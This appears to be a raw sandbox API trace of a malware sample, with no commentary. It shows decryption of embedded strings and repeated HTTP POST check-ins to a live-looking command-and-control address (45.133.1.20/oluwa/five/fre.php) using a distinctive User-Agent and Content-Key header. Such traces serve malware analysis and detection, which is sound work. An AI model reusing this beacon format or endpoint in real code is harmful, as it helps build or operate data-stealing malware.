GetProcessHeap () returned 0x6a0000 [0182.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0182.259] GetProcessHeap () returned 0x6a0000 [0182.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.260] send (s=0x3fc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0182.260] send (s=0x3fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0182.260] GetProcessHeap () returned 0x6a0000 [0182.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0182.261] recv (in: s=0x3fc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0182.338] GetProcessHeap () returned 0x6a0000 [0182.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0182.339] GetProcessHeap () returned 0x6a0000 [0182.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0182.341] GetProcessHeap () returned 0x6a0000 [0182.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0182.341] GetProcessHeap () returned 0x6a0000 [0182.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0182.342] closesocket (s=0x3fc) returned 0 [0182.343] GetProcessHeap () returned 0x6a0000 [0182.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0182.343] GetProcessHeap () returned 0x6a0000 [0182.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.343] GetProcessHeap () returned 0x6a0000 [0182.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.344] GetProcessHeap () returned 0x6a0000 [0182.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x109c) returned 0x3fc [0182.346] Sleep (dwMilliseconds=0xea60) [0182.348] GetProcessHeap () returned 0x6a0000 [0182.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0182.376] GetProcessHeap () returned 0x6a0000 [0182.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6848 [0182.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.378] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b6848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.379] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.380] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.380] GetProcessHeap () returned 0x6a0000 [0182.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6848 | out: hHeap=0x6a0000) returned 1 [0182.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.382] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.390] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.391] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0182.392] GetProcessHeap () returned 0x6a0000 [0182.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.393] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.398] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.399] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.415] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.420] GetProcessHeap () returned 0x6a0000 [0182.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.420] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.421] GetProcessHeap () returned 0x6a0000 [0182.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.421] GetProcessHeap () returned 0x6a0000 [0182.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.422] GetProcessHeap () returned 0x6a0000 [0182.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.425] GetProcessHeap () returned 0x6a0000 [0182.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0182.449] GetProcessHeap () returned 0x6a0000 [0182.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0182.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.450] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.451] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.453] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.453] GetProcessHeap () returned 0x6a0000 [0182.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0182.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.455] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.459] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.461] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0182.461] GetProcessHeap () returned 0x6a0000 [0182.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.462] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0182.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.464] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0182.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.465] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0182.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.471] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0182.471] GetProcessHeap () returned 0x6a0000 [0182.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.472] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0182.472] GetProcessHeap () returned 0x6a0000 [0182.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0182.472] socket (af=2, type=1, protocol=6) returned 0x404 [0182.472] connect (s=0x404, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0182.499] FreeAddrInfoW (pAddrInfo=0x6bfa80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0182.499] GetProcessHeap () returned 0x6a0000 [0182.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0182.499] GetProcessHeap () returned 0x6a0000 [0182.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0182.500] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.501] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.501] GetProcessHeap () returned 0x6a0000 [0182.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0182.501] GetProcessHeap () returned 0x6a0000 [0182.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.503] GetProcessHeap () returned 0x6a0000 [0182.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0182.503] GetProcessHeap () returned 0x6a0000 [0182.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0182.504] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.505] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.505] GetProcessHeap () returned 0x6a0000 [0182.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0182.505] GetProcessHeap () returned 0x6a0000 [0182.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.506] send (s=0x404, buf=0x6bbd20*, len=242, flags=0) returned 242 [0182.507] send (s=0x404, buf=0x6bb998*, len=159, flags=0) returned 159 [0182.507] GetProcessHeap () returned 0x6a0000 [0182.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0182.507] recv (in: s=0x404, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0182.593] GetProcessHeap () returned 0x6a0000 [0182.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0182.594] GetProcessHeap () returned 0x6a0000 [0182.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0182.595] GetProcessHeap () returned 0x6a0000 [0182.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0182.595] GetProcessHeap () returned 0x6a0000 [0182.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0182.596] closesocket (s=0x404) returned 0 [0182.596] GetProcessHeap () returned 0x6a0000 [0182.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0182.596] GetProcessHeap () returned 0x6a0000 [0182.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.597] GetProcessHeap () returned 0x6a0000 [0182.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.597] GetProcessHeap () returned 0x6a0000 [0182.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0182.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10a8) returned 0x404 [0182.600] Sleep (dwMilliseconds=0xea60) [0182.601] GetProcessHeap () returned 0x6a0000 [0182.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0182.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0182.624] GetProcessHeap () returned 0x6a0000 [0182.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9d88 [0182.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.625] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b9d88, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.627] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.628] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.628] GetProcessHeap () returned 0x6a0000 [0182.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9d88 | out: hHeap=0x6a0000) returned 1 [0182.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.631] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0182.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.632] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.633] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0182.639] GetProcessHeap () returned 0x6a0000 [0182.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.640] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.642] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.645] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.646] GetProcessHeap () returned 0x6a0000 [0182.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0182.647] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.647] GetProcessHeap () returned 0x6a0000 [0182.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0182.647] GetProcessHeap () returned 0x6a0000 [0182.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0182.648] GetProcessHeap () returned 0x6a0000 [0182.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0182.648] GetProcessHeap () returned 0x6a0000 [0182.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0182.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.650] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.659] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0182.670] GetProcessHeap () returned 0x6a0000 [0182.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0182.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.672] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0182.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.673] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.674] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.674] GetProcessHeap () returned 0x6a0000 [0182.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0182.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.677] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0182.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.678] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0182.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0182.679] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0182.679] GetProcessHeap () returned 0x6a0000 [0182.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0182.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.696] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0182.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.697] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0182.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.698] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0182.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.699] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0182.699] GetProcessHeap () returned 0x6a0000 [0182.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0182.699] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0182.699] GetProcessHeap () returned 0x6a0000 [0182.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0182.699] socket (af=2, type=1, protocol=6) returned 0x408 [0182.699] connect (s=0x408, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0182.726] FreeAddrInfoW (pAddrInfo=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0182.726] GetProcessHeap () returned 0x6a0000 [0182.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0182.727] GetProcessHeap () returned 0x6a0000 [0182.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0182.727] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.728] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.728] GetProcessHeap () returned 0x6a0000 [0182.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0182.728] GetProcessHeap () returned 0x6a0000 [0182.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.729] GetProcessHeap () returned 0x6a0000 [0182.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0182.729] GetProcessHeap () returned 0x6a0000 [0182.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0182.730] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0182.731] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.731] GetProcessHeap () returned 0x6a0000 [0182.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0182.731] GetProcessHeap () returned 0x6a0000 [0182.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0182.731] send (s=0x408, buf=0x6bbd20*, len=242, flags=0) returned 242 [0182.732] send (s=0x408, buf=0x6bb998*, len=159, flags=0) returned 159 [0182.732] GetProcessHeap () returned 0x6a0000 [0182.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0182.732] recv (in: s=0x408, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0182.805] GetProcessHeap () returned 0x6a0000 [0182.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0182.805] 